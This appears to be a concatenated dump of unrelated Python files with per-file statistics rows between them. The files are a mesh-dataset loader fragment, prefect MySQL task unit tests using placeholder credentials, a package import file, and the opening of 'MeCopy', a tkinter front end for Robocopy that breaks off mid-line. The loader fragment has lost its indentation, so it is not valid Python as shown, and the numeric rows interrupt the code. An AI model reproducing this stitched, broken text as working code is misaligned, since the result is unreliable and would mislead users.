verts = np.array(para_dic["verts"])
vert_norms = np.array(para_dic["vert_norms"])
# get joint move and position
joint_move = np.array(para_dic["joint_move"])
joint_posi = para_dic["joint_posi"]
# get anchor move and position
achr_move = np.array(para_dic["achr_move"])
achr_posi = para_dic["achr_posi"]
# make source for joint net
sil_j = all_sil[:,:,:2]
src_j = np.zeros((10, 2, 64, 64))
for i in range(len(joint_posi)):
crop_sil = center_crop(sil_j, joint_posi[i], 64)
src_j[i,:,:,:] = np.rollaxis(crop_sil, 2, 0)
# make source for anchor net
src_a = None
        # commented out because prediction doesn't require this
'''
sil_a = np.stack((all_sil[:,:,0], all_sil[:,:,2]), axis = -1)
src_a = np.zeros((200, 2, 32, 32))
for i in range(len(achr_posi)):
crop_sil = center_crop(sil_a, achr_posi[i], 32)
src_a[i,:,:,:] = np.rollaxis(crop_sil, 2, 0)
'''
return (src_j, src_a, src_img, joint_move, achr_move, verts,
vert_norms, proc_para, all_sil, joint_posi, achr_posi)
#==============================================================================
# data loader for efficient demo (no ground-truth reading, only test)
#==============================================================================
class dataloader_demo(Dataset):
def __init__(self, dataset_path):
self.dataset_dir = dataset_path+"test/"
self.num = 4625
self.id_list = list(range(self.num))
def __len__(self):
return self.num
def __getitem__(self, index):
img_id = self.id_list[index]
# get parameters
        with open(self.dataset_dir + "/para/%08d.json" % img_id, 'rb') as fp:
para_dic = json.load(fp)
# get src_img and pre-processing parameters
img_file = para_dic["img_file"]
src_img = np.array(PIL.Image.open(self.dataset_dir + img_file))
proc_para = para_dic["proc_para"]
# get verts and vert_norms
verts = np.array(para_dic["verts"])
vert_norms = np.array(para_dic["vert_norms"])
return (src_img, verts, vert_norms)
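# Usage sketch for the demo loader (the dataset root below is hypothetical):
# demo = dataloader_demo("/path/to/hmd_dataset/")
# src_img, verts, vert_norms = demo[0]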
| 37.059574
| 100
| 0.524056
| 2,191
| 17,418
| 3.893199
| 0.090826
| 0.030363
| 0.03939
| 0.031653
| 0.823095
| 0.811958
| 0.781008
| 0.75932
| 0.756389
| 0.728722
| 0
| 0.029402
| 0.322425
| 17,418
| 469
| 101
| 37.138593
| 0.693357
| 0.190263
| 0
| 0.765517
| 0
| 0
| 0.04583
| 0.008779
| 0
| 0
| 0
| 0
| 0
| 1
| 0.062069
| false
| 0
| 0.037931
| 0.02069
| 0.168966
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b77bb594277aad12ca4e874bc36e5e0acbbb6f99
| 3,766
|
py
|
Python
|
tests/tasks/mysql/test_mysql.py
|
vlad-mois/prefect
|
5427ddb2e49dc4732ad034c58ed2604ea1faa4a3
|
[
"Apache-2.0"
] | 3
|
2021-11-09T10:46:58.000Z
|
2022-03-11T04:22:35.000Z
|
tests/tasks/mysql/test_mysql.py
|
vlad-mois/prefect
|
5427ddb2e49dc4732ad034c58ed2604ea1faa4a3
|
[
"Apache-2.0"
] | null | null | null |
tests/tasks/mysql/test_mysql.py
|
vlad-mois/prefect
|
5427ddb2e49dc4732ad034c58ed2604ea1faa4a3
|
[
"Apache-2.0"
] | 1
|
2022-03-11T04:22:40.000Z
|
2022-03-11T04:22:40.000Z
|
import pytest
import pymysql
from unittest.mock import MagicMock
from prefect.tasks.mysql.mysql import MySQLExecute, MySQLFetch
class TestMySQLExecute:
def test_construction(self):
task = MySQLExecute(db_name="test", user="test", password="test", host="test")
assert (task.commit is False) and (task.charset == "utf8mb4")
def test_query_string_must_be_provided(self):
task = MySQLExecute(db_name="test", user="test", password="test", host="test")
with pytest.raises(ValueError, match="A query string must be provided"):
task.run()
def test_run_args_used_over_init_args(self, monkeypatch):
mock_connect = MagicMock()
monkeypatch.setattr("pymysql.connect", mock_connect)
task = MySQLExecute(
db_name="test", user="test", password="initpassword", host="test"
)
task.run(query="select * from users", password="password_from_secret")
assert mock_connect.call_args[1]["password"] == "password_from_secret"
class TestMySQLFetch:
def test_construction(self):
task = MySQLFetch(db_name="test", user="test", password="test", host="test")
assert task.fetch == "one"
def test_query_string_must_be_provided(self):
task = MySQLFetch(db_name="test", user="test", password="test", host="test")
with pytest.raises(ValueError, match="A query string must be provided"):
task.run()
def test_bad_fetch_param_raises(self):
task = MySQLFetch(db_name="test", user="test", password="test", host="test")
with pytest.raises(
ValueError,
match=r"The 'fetch' parameter must be one of the following - \('one', 'many', 'all'\)",
):
task.run(query="SELECT * FROM some_table", fetch="not a valid parameter")
def test_construction_with_cursor_type_str(self):
task = MySQLFetch(
db_name="test",
user="test",
password="test",
host="test",
cursor_type="dictcursor",
)
assert task.cursor_type == "dictcursor"
def test_construction_with_cursor_type_class(self):
task = MySQLFetch(
db_name="test",
user="test",
password="test",
host="test",
cursor_type=pymysql.cursors.DictCursor,
)
assert task.cursor_type == pymysql.cursors.DictCursor
def test_unsupported_cursor_type_str_param_raises(self):
cursor_type = "unsupportedcursor"
task = MySQLFetch(db_name="test", user="test", password="test", host="test")
with pytest.raises(
TypeError,
match=rf"'cursor_type' should be one of \['cursor', 'dictcursor', 'sscursor', 'ssdictcursor'\] or a full cursor class, got {cursor_type}",
):
task.run(query="SELECT * FROM some_table", cursor_type=cursor_type)
def test_bad_cursor_type_param_type_raises(self):
task = MySQLFetch(db_name="test", user="test", password="test", host="test")
with pytest.raises(
TypeError,
match=rf"'cursor_type' should be one of \['cursor', 'dictcursor', 'sscursor', 'ssdictcursor'\] or a full cursor class, got \['cursor'\]",
):
task.run(query="SELECT * FROM some_table", cursor_type=["cursor"])
def test_run_args_used_over_init_args(self, monkeypatch):
mock_connect = MagicMock()
monkeypatch.setattr("pymysql.connect", mock_connect)
task = MySQLFetch(
db_name="test", user="test", password="initpassword", host="test"
)
task.run(query="select * from users", password="password_from_secret")
assert mock_connect.call_args[1]["password"] == "password_from_secret"
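# Pattern used in the two test_run_args_used_over_init_args tests above, in
# brief: monkeypatch swaps pymysql.connect for a MagicMock, so task.run() never
# opens a real connection, and mock_connect.call_args[1] exposes the keyword
# arguments the task actually passed (here, the password supplied to run()).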
| 39.229167
| 150
| 0.635953
| 445
| 3,766
| 5.177528
| 0.193258
| 0.065104
| 0.047743
| 0.06684
| 0.823351
| 0.764323
| 0.735677
| 0.722222
| 0.712674
| 0.684896
| 0
| 0.00139
| 0.235794
| 3,766
| 95
| 151
| 39.642105
| 0.799166
| 0
| 0
| 0.605263
| 0
| 0.039474
| 0.237387
| 0
| 0
| 0
| 0
| 0
| 0.078947
| 1
| 0.144737
| false
| 0.197368
| 0.052632
| 0
| 0.223684
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
b7aebd54c20d3154cab1dfe3274a13e135f6b8d8
| 400
|
py
|
Python
|
Platforms/Web/Processing/__init__.py
|
The-CJ/Phaazebot
|
83a9563d210718071d4e2cdcca3b212c87abaf51
|
[
"MIT"
] | 2
|
2017-09-14T08:07:55.000Z
|
2021-05-18T05:05:05.000Z
|
Platforms/Web/Processing/__init__.py
|
The-CJ/Phaazebot
|
83a9563d210718071d4e2cdcca3b212c87abaf51
|
[
"MIT"
] | 111
|
2018-04-15T14:32:14.000Z
|
2021-03-28T21:06:29.000Z
|
Platforms/Web/Processing/__init__.py
|
The-CJ/Phaazebot
|
83a9563d210718071d4e2cdcca3b212c87abaf51
|
[
"MIT"
] | 1
|
2018-04-15T13:24:44.000Z
|
2018-04-15T13:24:44.000Z
|
import Platforms.Web.Processing.Account as Account
import Platforms.Web.Processing.Admin as Admin
import Platforms.Web.Processing.Api as Api
import Platforms.Web.Processing.Discord as Discord
import Platforms.Web.Processing.Twitch as Twitch
import Platforms.Web.Processing.errors as errors
import Platforms.Web.Processing.mainsite as mainsite
import Platforms.Web.Processing.webcontent as webcontent
| 44.444444
| 56
| 0.86
| 56
| 400
| 6.142857
| 0.232143
| 0.348837
| 0.418605
| 0.651163
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.08
| 400
| 9
| 56
| 44.444444
| 0.934783
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b7f812758c108f6bbf0f3ac2fa32b49e9949e4f6
| 134,671
|
py
|
Python
|
main.py
|
w4rexx/MeCopy
|
25e48439b654e3afab053c3b015ac2d97ad8c7f2
|
[
"MIT"
] | null | null | null |
main.py
|
w4rexx/MeCopy
|
25e48439b654e3afab053c3b015ac2d97ad8c7f2
|
[
"MIT"
] | null | null | null |
main.py
|
w4rexx/MeCopy
|
25e48439b654e3afab053c3b015ac2d97ad8c7f2
|
[
"MIT"
] | 1
|
2021-12-21T08:56:10.000Z
|
2021-12-21T08:56:10.000Z
|
"""
MeCopy (Modular Extension Copy) is a GUI for Robocopy built from independent modules
that let you copy, move, or delete files on your computer at the same time without
the modules interfering with one another.
Copyright© W4rex / Alejandro Duarte
Github: https://github.com/w4rexx/MeCopy
"""
import sys
import os
import tkinter as tk
import shutil
import errno
import os.path
import posixpath
import fnmatch
import time
import webbrowser
import win32api
import pywintypes
import threading
import glob
from fnmatch import _compile_pattern
from configparser import ConfigParser
from tkscrolledframe import ScrolledFrame
from tkinter import ttk
from tkinter import filedialog
from tkinter import messagebox
from os.path import isdir, join
from shutil import copytree
from os import rmdir, walk
from ast import literal_eval
from PIL import ImageTk, Image
from subprocess import call
from ttkbootstrap import Style
# Monkey patch to make fnmatch accept a tuple of patterns.
def filter_patterns(names, pat):
"""Return the subset of the list NAMES that match PAT."""
result = []
pats = pat if isinstance(pat, tuple) else (pat,)
matches = []
for pat in pats:
pat = os.path.normcase(pat)
matches.append(_compile_pattern(pat))
if os.path is posixpath:
# normcase on posix is NOP. Optimize it away from the loop.
for name in names:
for match in matches:
if match(name):
result.append(name)
break
else:
for name in names:
for match in matches:
if match(os.path.normcase(name)):
result.append(name)
break
return result
fnmatch.filter = filter_patterns
# End of monkey patch for fnmatch
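# Quick illustration of the patched behavior (the file names are hypothetical):
# the stock fnmatch.filter takes a single pattern string; the patched version
# also accepts a tuple and keeps a name if any pattern in the tuple matches.
assert fnmatch.filter(["a.txt", "b.png", "c.jpg"], ("*.png", "*.jpg")) == ["b.png", "c.jpg"]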
try:
os.makedirs('logs')
except OSError as e:
if e.errno != errno.EEXIST:
raise
parser = ConfigParser()
parser.read('config.ini')
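# Assumed config.ini layout, inferred from the parser.get() calls throughout
# this module (section and option names come from the code; the values are
# examples only):
# [Path_Names]
# path_name_1 = Documents
# [Paths_Src]
# path_1 = C:/Users/example/Downloads
# [Paths_Dst]
# path_1 = D:/Backup/Documents
# [Extensions]
# search_1 = ('*.pdf', '*.docx')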
Version = ("(v.1.0)")
def raise_frame(frame):
frame.tkraise()
root = tk.Tk()
root.title("MeCopy")
root.config(bg="#dbdbdb")
root.geometry("1280x670+35+0")
root.resizable(False, False)
root.iconbitmap("icon.ico")
Move_Screen = tk.Frame(root)
Move_Screen.config(bg="#dbdbdb")
Move_Screen.place(x=0, y=0, width=1280, height=667)
Delete_Menu_Screen = tk.Frame(root)
Delete_Menu_Screen.config(bg="#dbdbdb")
Delete_Menu_Screen.place(x=0, y=0, width=1280, height=667)
Move_Frame = tk.Frame(Move_Screen)
Move_Frame.config(bg="#dbdbdb", width=1280, height=667, padx=55, pady=20)
Move_Frame.grid(row=0, column=0)
Delete_Frame = tk.Frame(Delete_Menu_Screen)
Delete_Frame.config(bg="#dbdbdb", width=1280, height=667, padx=55, pady=20)
Delete_Frame.grid(row=0, column=0)
s = ttk.Style(root)
s.theme_use('clam')
s.configure('flat.TButton', padding=1)
estyle = ttk.Style()
estyle.element_create("plain.field", "from", "clam")
estyle.layout("EntryStyle.TEntry",
[('Entry.plain.field', {'children': [(
'Entry.background', {'children': [(
'Entry.padding', {'children': [(
'Entry.textarea', {'sticky': 'nswe'})],
'sticky': 'nswe'})], 'sticky': 'nswe'})],
'border': '1', 'sticky': 'nswe'})])
estyle.configure("EntryStyle.TEntry",
background="#dbdbdb",
foreground="#373636",
fieldbackground="grey", relief='flat',
highlightthickness=1,
highlightbackground="#ec3c3c",
selectbackground="#357ebd")
estyle.layout("EntryStyle.TEntry_Paths",
[('Entry.plain.field', {'children': [(
'Entry.background', {'children': [(
'Entry.padding', {'children': [(
'Entry.textarea', {'sticky': 'nswe'})],
'sticky': 'nswe'})], 'sticky': 'nswe'})],
'border': '0', 'sticky': 'nswe'})])
estyle.configure("EntryStyle.TEntry_Paths",
background="#dbdbdb", foreground="#3671be")
menubar = tk.Menu(root)
root.config(menu=menubar)
filemenu = tk.Menu(menubar, tearoff=0)
filemenu.add_command(label="Exit", command=root.quit)
helpmenu = tk.Menu(menubar, tearoff=0)
helpmenu.add_command(label="About...", command=lambda: [info_window()])
menubar.add_cascade(label="File", menu=filemenu)
menubar.add_cascade(label="Help", menu=helpmenu)
class EntryEx(ttk.Entry):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.menu = tk.Menu(self, tearoff=False)
self.menu.add_command(label="Copy", command=self.popup_copy)
self.menu.add_command(label="Cut", command=self.popup_cut)
self.menu.add_separator()
self.menu.add_command(label="Paste", command=self.popup_paste)
self.bind("<Button-3>", self.display_popup)
def display_popup(self, event):
self.menu.post(event.x_root, event.y_root)
def popup_copy(self):
self.event_generate("<<Copy>>")
def popup_cut(self):
self.event_generate("<<Cut>>")
def popup_paste(self):
self.event_generate("<<Paste>>")
def callback(url):
webbrowser.open_new(url)
def callback_2(url):
webbrowser.open_new(url)
def info_window():
window = tk.Toplevel(root)
window.title("MeCopy")
window.config(bg="#dbdbdb")
window.geometry("500x200+420+300")
window.resizable(False, False)
window.iconbitmap("icon.ico")
Logo_Img_Open = ImageTk.PhotoImage(Image.open("Images/logo.png"))
Logo = tk.Label(window, bg="#dbdbdb", image=Logo_Img_Open)
Logo.place(x=10, y=120)
Logo.image = Logo_Img_Open
link1 = tk.Label(window, text="Contact", fg="blue",
bg="#dbdbdb", cursor="hand2")
link1.place(x=22, y=10)
link1.bind(
"<Button-1>", lambda e: callback_2(" https://github.com/w4rexx"))
Info_Version = tk.Label(window, bg="#dbdbdb", fg="#382d2b",
text="MeCopy " + Version).place(x=204, y=20)
Info_Description = tk.Label(window, bg="#dbdbdb", fg="#382d2b",
text="MeCopy (Modular Extension Copy) It is a GUI for Robocopy based on independent modules in which you can copy, move or delete files on your computer at the same time without any module interfering with each other.", wraplength=350).place(x=85, y=55)
Info_Dev = tk.Label(window, bg="#dbdbdb", fg="#382d2b",
text="Copyright© W4rex / Alejandro Duarte").place(x=290, y=177)
Exit_Button = ttk.Button(window, text="Close",
command=window.destroy).place(x=210, y=140)
# MOVE_MODULES_TITLE
Move_Module_Name_1 = tk.StringVar()
Entry_Path_1 = EntryEx(Move_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Move_Module_Name_1).place(x=165, y=0)
Move_Module_Name_1.set(parser.get("Path_Names", "path_name_1"))
Move_Module_Name_2 = tk.StringVar()
Entry_Path_2 = EntryEx(Move_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Move_Module_Name_2).place(x=165, y=112)
Move_Module_Name_2.set(parser.get("Path_Names", "path_name_2"))
Move_Module_Name_3 = tk.StringVar()
Entry_Path_3 = EntryEx(Move_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Move_Module_Name_3).place(x=165, y=225)
Move_Module_Name_3.set(parser.get("Path_Names", "path_name_3"))
Move_Module_Name_4 = tk.StringVar()
Entry_Path_4 = EntryEx(Move_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Move_Module_Name_4).place(x=165, y=345)
Move_Module_Name_4.set(parser.get("Path_Names", "path_name_4"))
Move_Module_Name_5 = tk.StringVar()
Entry_Path_5 = EntryEx(Move_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Move_Module_Name_5).place(x=165, y=462)
Move_Module_Name_5.set(parser.get("Path_Names", "path_name_5"))
Move_Module_Name_6 = tk.StringVar()
Entry_Path_6 = EntryEx(Move_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Move_Module_Name_6).place(x=755, y=0)
Move_Module_Name_6.set(parser.get("Path_Names", "path_name_6"))
Move_Module_Name_7 = tk.StringVar()
Entry_Path_7 = EntryEx(Move_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Move_Module_Name_7).place(x=755, y=112)
Move_Module_Name_7.set(parser.get("Path_Names", "path_name_7"))
Move_Module_Name_8 = tk.StringVar()
Entry_Path_8 = EntryEx(Move_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Move_Module_Name_8).place(x=755, y=225)
Move_Module_Name_8.set(parser.get("Path_Names", "path_name_8"))
Move_Module_Name_9 = tk.StringVar()
Entry_Path_9 = EntryEx(Move_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Move_Module_Name_9).place(x=755, y=345)
Move_Module_Name_9.set(parser.get("Path_Names", "path_name_9"))
Move_Module_Name_10 = tk.StringVar()
Entry_Path_10 = EntryEx(Move_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Move_Module_Name_10).place(x=755, y=462)
Move_Module_Name_10.set(parser.get("Path_Names", "path_name_10"))
# MOVE_MODULES_TITLE_END
# MOVE_MODULES_SRC_PETITION
def Get_Src_Path_1():
Src_Path_1_Selected = filedialog.askdirectory()
Src_Path_1.set(Src_Path_1_Selected)
Src_Path_1 = tk.StringVar()
Src_Path_1.set(parser.get("Paths_Src", "path_1"))
def Get_Src_Path_2():
Src_Path_2_Selected = filedialog.askdirectory()
Src_Path_2.set(Src_Path_2_Selected)
Src_Path_2 = tk.StringVar()
Src_Path_2.set(parser.get("Paths_Src", "path_2"))
def Get_Src_Path_3():
Src_Path_3_Selected = filedialog.askdirectory()
Src_Path_3.set(Src_Path_3_Selected)
Src_Path_3 = tk.StringVar()
Src_Path_3.set(parser.get("Paths_Src", "path_3"))
def Get_Src_Path_4():
Src_Path_4_Selected = filedialog.askdirectory()
Src_Path_4.set(Src_Path_4_Selected)
Src_Path_4 = tk.StringVar()
Src_Path_4.set(parser.get("Paths_Src", "path_4"))
def Get_Src_Path_5():
Src_Path_5_Selected = filedialog.askdirectory()
Src_Path_5.set(Src_Path_5_Selected)
Src_Path_5 = tk.StringVar()
Src_Path_5.set(parser.get("Paths_Src", "path_5"))
def Get_Src_Path_6():
Src_Path_6_Selected = filedialog.askdirectory()
Src_Path_6.set(Src_Path_6_Selected)
Src_Path_6 = tk.StringVar()
Src_Path_6.set(parser.get("Paths_Src", "path_6"))
def Get_Src_Path_7():
Src_Path_7_Selected = filedialog.askdirectory()
Src_Path_7.set(Src_Path_7_Selected)
Src_Path_7 = tk.StringVar()
Src_Path_7.set(parser.get("Paths_Src", "path_7"))
def Get_Src_Path_8():
Src_Path_8_Selected = filedialog.askdirectory()
Src_Path_8.set(Src_Path_8_Selected)
Src_Path_8 = tk.StringVar()
Src_Path_8.set(parser.get("Paths_Src", "path_8"))
def Get_Src_Path_9():
Src_Path_9_Selected = filedialog.askdirectory()
Src_Path_9.set(Src_Path_9_Selected)
Src_Path_9 = tk.StringVar()
Src_Path_9.set(parser.get("Paths_Src", "path_9"))
def Get_Src_Path_10():
Src_Path_10_Selected = filedialog.askdirectory()
Src_Path_10.set(Src_Path_10_Selected)
Src_Path_10 = tk.StringVar()
Src_Path_10.set(parser.get("Paths_Src", "path_10"))
Src_Title_1 = tk.Label(Move_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=64, y=19)
Patch_1_Entry = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Src_Path_1).place(x=155, y=22)
btnFind_Path_1 = ttk.Button(Move_Frame, text="Search",
style="flat.TButton", command=Get_Src_Path_1).place(x=282, y=21)
Src_Title_2 = tk.Label(Move_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=64, y=130)
Patch_2_Entry = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Src_Path_2).place(x=155, y=133)
btnFind_Path_2 = ttk.Button(Move_Frame, text="Search",
style="flat.TButton", command=Get_Src_Path_2).place(x=282, y=132)
Src_Title_3 = tk.Label(Move_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=64, y=247)
Patch_3_Entry = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Src_Path_3).place(x=155, y=250)
btnFind_Path_3 = ttk.Button(Move_Frame, text="Search",
style="flat.TButton", command=Get_Src_Path_3).place(x=282, y=249)
Src_Title_4 = tk.Label(Move_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=64, y=365)
Patch_4_Entry = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Src_Path_4).place(x=155, y=369)
btnFind_Path_4 = ttk.Button(Move_Frame, text="Search",
style="flat.TButton", command=Get_Src_Path_4).place(x=282, y=368)
Src_Title_5 = tk.Label(Move_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=64, y=481)
Patch_5_Entry = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Src_Path_5).place(x=155, y=485)
btnFind_Path_5 = ttk.Button(Move_Frame, text="Search",
style="flat.TButton", command=Get_Src_Path_5).place(x=282, y=484)
Src_Title_6 = tk.Label(Move_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=654, y=19)
Patch_6_Entry = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Src_Path_6).place(x=746, y=22)
btnFind_Path_6 = ttk.Button(Move_Frame, text="Search",
style="flat.TButton", command=Get_Src_Path_6).place(x=873, y=21)
Src_Title_7 = tk.Label(Move_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=654, y=130)
Patch_7_Entry = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Src_Path_7).place(x=746, y=133)
btnFind_Path_7 = ttk.Button(Move_Frame, text="Search",
style="flat.TButton", command=Get_Src_Path_7).place(x=873, y=132)
Src_Title_8 = tk.Label(Move_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=654, y=247)
Patch_8_Entry = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Src_Path_8).place(x=746, y=250)
btnFind_Path_8 = ttk.Button(Move_Frame, text="Search",
style="flat.TButton", command=Get_Src_Path_8).place(x=873, y=249)
Src_Title_9 = tk.Label(Move_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=654, y=365)
Patch_9_Entry = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Src_Path_9).place(x=746, y=369)
btnFind_Path_9 = ttk.Button(Move_Frame, text="Search",
style="flat.TButton", command=Get_Src_Path_9).place(x=873, y=368)
Src_Title_10 = tk.Label(Move_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=654, y=481)
Patch_10_Entry = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Src_Path_10).place(x=746, y=485)
btnFind_Path_10 = ttk.Button(
Move_Frame, text="Search", style="flat.TButton", command=Get_Src_Path_10).place(x=873, y=484)
# MOVE_MODULES_SRC_PETITION_END
# MOVE_MODULES_DST_PETITION
def Get_Dst_Path_1():
folder_selected1 = filedialog.askdirectory()
Dst_Path_1.set(folder_selected1)
Dst_Path_1 = tk.StringVar()
Dst_Path_1.set(parser.get("Paths_Dst", "path_1"))
def Get_Dst_Path_2():
folder_selected2 = filedialog.askdirectory()
Dst_Path_2.set(folder_selected2)
Dst_Path_2 = tk.StringVar()
Dst_Path_2.set(parser.get("Paths_Dst", "path_2"))
def Get_Dst_Path_3():
folder_selected3 = filedialog.askdirectory()
Dst_Path_3.set(folder_selected3)
Dst_Path_3 = tk.StringVar()
Dst_Path_3.set(parser.get("Paths_Dst", "path_3"))
def Get_Dst_Path_4():
folder_selected4 = filedialog.askdirectory()
Dst_Path_4.set(folder_selected4)
Dst_Path_4 = tk.StringVar()
Dst_Path_4.set(parser.get("Paths_Dst", "path_4"))
def Get_Dst_Path_5():
folder_selected5 = filedialog.askdirectory()
Dst_Path_5.set(folder_selected5)
Dst_Path_5 = tk.StringVar()
Dst_Path_5.set(parser.get("Paths_Dst", "path_5"))
def Get_Dst_Path_6():
folder_selected6 = filedialog.askdirectory()
Dst_Path_6.set(folder_selected6)
Dst_Path_6 = tk.StringVar()
Dst_Path_6.set(parser.get("Paths_Dst", "path_6"))
def Get_Dst_Path_7():
folder_selected7 = filedialog.askdirectory()
Dst_Path_7.set(folder_selected7)
Dst_Path_7 = tk.StringVar()
Dst_Path_7.set(parser.get("Paths_Dst", "path_7"))
def Get_Dst_Path_8():
folder_selected8 = filedialog.askdirectory()
Dst_Path_8.set(folder_selected8)
Dst_Path_8 = tk.StringVar()
Dst_Path_8.set(parser.get("Paths_Dst", "path_8"))
def Get_Dst_Path_9():
folder_selected9 = filedialog.askdirectory()
Dst_Path_9.set(folder_selected9)
Dst_Path_9 = tk.StringVar()
Dst_Path_9.set(parser.get("Paths_Dst", "path_9"))
def Get_Dst_Path_10():
folder_selected10 = filedialog.askdirectory()
Dst_Path_10.set(folder_selected10)
Dst_Path_10 = tk.StringVar()
Dst_Path_10.set(parser.get("Paths_Dst", "path_10"))
Search_1_Path = tk.Label(Move_Frame, text="Send to:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=77, y=46)
E2 = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Dst_Path_1).place(x=155, y=50)
btnFind2 = ttk.Button(Move_Frame, text="Search", style="flat.TButton",
command=Get_Dst_Path_1).place(x=282, y=49)
Search_2_Path = tk.Label(Move_Frame, text="Send to:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=77, y=158)
E3 = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Dst_Path_2).place(x=155, y=162)
btnFind3 = ttk.Button(Move_Frame, text="Search", style="flat.TButton",
command=Get_Dst_Path_2).place(x=282, y=162)
Search_3_Path = tk.Label(Move_Frame, text="Send to:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=77, y=274)
E4 = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Dst_Path_3).place(x=155, y=278)
btnFind4 = ttk.Button(Move_Frame, text="Search", style="flat.TButton",
command=Get_Dst_Path_3).place(x=282, y=277)
Search_4_Path = tk.Label(Move_Frame, text="Send to:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=77, y=393)
E4 = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Dst_Path_4).place(x=155, y=397)
btnFind4 = ttk.Button(Move_Frame, text="Search", style="flat.TButton",
command=Get_Dst_Path_4).place(x=282, y=396)
Search_5_Path = tk.Label(Move_Frame, text="Send to:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=77, y=508)
E5 = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Dst_Path_5).place(x=155, y=512)
btnFind5 = ttk.Button(Move_Frame, text="Search", style="flat.TButton",
command=Get_Dst_Path_5).place(x=282, y=511)
Search_6_Path = tk.Label(Move_Frame, text="Send to:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=670, y=47)
E6 = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Dst_Path_6).place(x=746, y=50)
btnFind6 = ttk.Button(Move_Frame, text="Search", style="flat.TButton",
command=Get_Dst_Path_6).place(x=873, y=49)
Search_7_Path = tk.Label(Move_Frame, text="Send to:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=670, y=158)
E7 = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Dst_Path_7).place(x=746, y=162)
btnFind7 = ttk.Button(Move_Frame, text="Search", style="flat.TButton",
command=Get_Dst_Path_7).place(x=873, y=162)
Search_8_Path = tk.Label(Move_Frame, text="Send to:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=670, y=274)
E8 = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Dst_Path_8).place(x=746, y=278)
btnFind8 = ttk.Button(Move_Frame, text="Search", style="flat.TButton",
command=Get_Dst_Path_8).place(x=873, y=277)
Search_9_Path = tk.Label(Move_Frame, text="Send to:", fg="#382d2b",
